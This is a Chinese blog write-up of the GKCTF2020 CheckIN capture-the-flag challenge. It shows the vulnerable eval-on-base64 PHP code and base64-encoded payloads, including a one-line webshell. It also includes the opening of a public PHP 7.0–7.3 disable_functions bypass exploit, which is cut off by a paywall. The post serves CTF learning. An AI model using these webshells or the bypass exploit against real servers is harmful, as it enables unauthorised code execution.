【学习笔记 22】 buu [GKCTF2020]CheckIN

最新推荐文章于 2023-07-14 16:12:58 发布
最新推荐文章于 2023-07-14 16:12:58 发布
阅读量560 收藏 1
点赞数
分类专栏: 网络安全 ctf 学习笔记 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43553654/article/details/106961657
版权

0x00 知识点

任意文件写入漏洞,部分过滤的绕过

0x01 解题过程

打开一看,代码审计

<title>Check_In</title>
<?php 
highlight_file(__FILE__);
class ClassName
{
   
        public $code = null;
        public $decode = null;
        function __construct()
        {
   
                $this->code = @$this->x()['Ginkgo'];//可以传参
                $this->decode = @base64_decode( $this->code );//basae64解密一下传入内容
                @Eval($this->decode);
        }

        public function x()
        {
   
                return $_REQUEST;
        }
}
new ClassName();

看到调用的魔法函数,起初以为是要考察反序列化,但是发现没有调用序列话函数,不过后来发现可以利用Ginkgo传参,可以直接写入到这个页面里,先写入一个phpinfo来看看效果,但是还需要用base64加密一下才可以

'phpinfo();'用base64加密后是 ‘cGhwaW5mbygpOw==’

构造payload

?Ginkgo=cGhwaW5mbygpOw==

效果如下
在这里插入图片描述
有很多的限制和禁用,那接下来写个木马试试

eval($_POST[‘lla’]);利用base64加密后ZXZhbCgkX1BPU1RbJ2xsYSddKQ==

构造payload

?Ginkgo=ZXZhbCgkX1BPU1RbJ2xsYSddKQ==

在这里插入图片描述这里还是只能用蚁剑或者cknife连马(蚁剑这个工具是真的猛,我的蚁剑终于弄好了,所以我选择用c刀,有机会我会把这几个工具都上传一下。)
在这里插入图片描述可以在根目录下看到flag,但是没法直接读取,但是有个readflag文件,那就是想办法执行这个文件不就行了,这里直接借用大佬的bypass脚本,我实在是写不出来,这里附上脚本链接
脚本内容

<?php

# PHP 7.0-7.3 disable_functions bypass PoC (*nix only)
#
# Bug: https://bugs.php.net/bug.php?id=72530
#
# This exploit should work on all PHP 7.0-7.3 versions
#
# Author: https://github.com/mm0r1

pwn("/readflag");//这里要修改到readflag的路径来来执行这个文件

function pwn($cmd) {
   
    global $abc, $helper;

    function str2ptr(&$str, $p = 0, $s = 8) {
   
        $address = 0;
        for($j = $s-1; $j >= 0; $j--) {
   
            $address <<= 8;
            $address |= ord($str[$p+$j]);
        }
        return $address;
    }

    function ptr2str($ptr, $m = 8) {
   
        $out = "";
        for ($i=0; $i < $m; $i++) {
   
            $out .= chr($ptr & 0xff);
            $ptr >>= 8;
        }
        return
最低0.47元/天 解锁文章
Noslpum
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUU 论坛的编辑器163Editor
09-21
"BUU 论坛的编辑器163Editor"是一个专为BUU论坛设计的文本编辑工具,它可能集成了丰富的富文本编辑功能,让用户在论坛发帖或回帖时可以方便地添加格式化文本、图片、链接等元素,提升交互体验。"DianUbb.rar"是这个...
[GKCTF2020]CheckIN 详细解题思路及做法
EC_Carrot的博客
12-07 1849
前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! 题目 打开题目,看到class以为是反序列化,但实际并不是,这里直接用$_REQUEST传入了参数便可以利用了。 看到base64_decode,说明我们的代码需要加密一下,尝试着直接传入c3lzdGVtKCdscycpOw==(即为base64加密后的system('ls');) 发现并不能返回数据,是难道是不能这么利用吗? 接着我尝试了一下cGh
[GKCTF2020]CheckIN
qq_45691294的博客
09-25 345
打开题目,直接得到源码 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = @$this->x()['Gink
BUUCTF-CheckIn
m0_47571887的博客
11-09 783
打开题目,貌似是一道考上传的题目 上传php文件被过滤,我们就上传图片马, 我们用.htaccess来进行解析,尝试过后貌似行不通, 这里使用.user.ini .user.ini:在php.ini中的配置项中有两个配置项,一个是auto_append_file和auto_prepend_file,auto_prrpend_file意思是指定一个文件,自动包含在要执行的文件前,类似与在文件前调用了require()函数。而auto_append_file相似,只是在文件后面进行包含,使用方法很简
[GKCTF2020]CheckIN详解
D1stiny的博客
06-01 4331
打开之后是这样的,没有发现反序列化函数,但是发现有一个@eval,想到了一句话,这是用base64进行传参 首先传参phpinfo();看看,需要经过base64编码 http://e0cc90ac-d4bc-450c-a6a4-476298ce7c18.node3.buuoj.cn/?Ginkgo=cGhwaW5mbygpOw== 找到disable_functions,发现过滤了许多危险函数 我们上传一个一句话木马看看 eval($_POST[123]);,经过base64是ZXZhbCgkX1
BUU刷题--[GKCTF2020]CheckIN [网鼎杯 2020 朱雀组]phpweb
weixin_48631429的博客
12-02 381
[GKCTF2020]CheckIN 打开题目: <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = @$this
2020网鼎杯青龙组Boom
05-12
【标题】"2020网鼎杯青龙组Boom" 涉及的是一个网络安全竞赛的场景,其中"网鼎杯"是中国国内知名的网络安全技术大赛,旨在提升参赛者的网络安全技能和应急处理能力。"青龙组"可能是比赛中的一个分组或者阶段,可能...
POSN:POSN-BUU的源代码
04-01
POSN-BUU可能是该系统的一个特定实现或者模块,主要用于处理BUU(Base Unit Unit,基本单元)相关的定位任务。这个源代码是用C++编程语言编写的,C++是一种通用且高效的编程语言,特别适合开发对性能要求高的系统...
2020年网鼎杯青龙组赛题.zip
05-10
比赛试题附件,其中包括misc,re,crypto,pwn,这些资源仅供学习参考,禁止用于盈利活动。希望大家可以合理利用,谢谢。
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
BUU实战笔记——[SUCTF 2019]CheckIn 1
qq_51175992的博客
07-14 209
文件上传中利用到.user.ini配置文件
BUUCTF:[GKCTF2020]CheckIN
qq_46230755的博客
12-16 504
这题还是很有意思的,考的点有 先看一下题目给的代码 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = @$this
buuctf-SUCTF 2019 CheckIn(小宇特详解)
小宇的web博客
01-22 2819
buuctf-SUCTF 2019 CheckIn(小宇特详解) 咋一看这是一道文件上传 这里先尝试一下上传一个php文件 里面写一个最简单的一句话木马就行 <?php eval(@$_POST['shell']);?> 上传试试 回显illegal suffix!(非法后缀) 这里尝试一下修改文件拓展名php5,phtml,等都没有成功 然后进行抓包,修改content-type,都是回显的illegal suffix!(非法后缀) 这里我上传一张jpg 回显<? in conten
GKCTF2020 checkin
qq_53755216的博客
06-23 318
写在前面 最近快期末考了 拼搏20天 我要上大二 每天晚上会找时间刷一下CTF 正片开始 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $thi
学习笔记 26】 buu [SUCTF 2019]CheckIn
weixin_43553654的博客
07-27 307
0x00 知识点 利用.user.ini文件的文件上传 利用利用GIF89a文件头绕过exif_imagetype()的检测。 0x01 知识点讲解 什么是.user.ini文件? 答:.user.ini文件相当于一个用户可以自定义的php.ini文件,但是有一点限制就是不能定义PHP_INI_SYSTEM模式,而在执行php代码之前,系统会对.user.ini先做一个执行,然后才执行其他的php文件。 怎么利用.user.ini文件? 答:我们可以在.user.ini文件中写入auto_prepen
部分WP-GKCTF2020
~airrudder~
05-24 6199
本篇内容 MISC: [GKCTF2020]签到 [GKCTF2020]Pokémon [GKCTF2020]问卷调查 [GKCTF2020]code obfuscation Crypto: [GKCTF2020]小学生的密码学 [GKCTF2020]汉字的秘密 [GKCTF2020]babycrypto Web: [GKCTF2020]CheckIN [GKCTF2020]老八小超市儿 Reverse: [GKCTF2020]Check_1n 上一篇 | 目录 | 下一篇 [GKC.
re学习笔记(64)GKCTF2020-re-Check_1n|BabyDriver
逆向随笔
05-24 1655
Check_1n 第一题运行程序,提示输入开机密码 输入错误会提示密码错误,去IDA搜索字符串得到密码HelloWord 然后开机后运行 打砖块 程序即可得到flag 切换程序的时候用箭头上下左右,回车启动, BabyDriver 搜索字符串发现有一串类似迷宫的字符串 迷宫字符串长度是225,刚开始以为是1515的,分析了下代码发现是1614的,, 可以写程序画出迷宫来,然后就是按键的问题了,,,因为是sys文件,所以按键应该是键盘扫描码而不是ASCII码 在线键盘扫描码查询 下移是0x25也就是K
GKCTF2020部分题解
羽的博客
05-24 4700
WEB [GKCTF2020]CheckIN 查看源代码发现没有任何限制,首先尝试传入phpinfo();的base64成功回显 那我们直接传 eval($_POST[1]);的base64然后蚁剑连接即可(Ginkgo=ZXZhbCgkX1BPU1RbMV0pOw==) 在根目录下发现flag和readflag 但是没有权限读取和运行,再仔细看下phpinfo中的信息发现禁用了命令执行的函数,这里给出大神们写的绕过dis_func的php代码 链接:https://pan.baidu.com/s/12
buu cipher
最新发布
10-23
Buu Cipher 的加密过程可以简单地分为两个步骤:混淆和扩散。 首先,混淆步骤使用一个密钥和置换表对明文进行置换。置换表是由密钥生成的,用于打乱明文中字符的顺序。这样,原本明文中相邻的字符将被分散到密文中...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值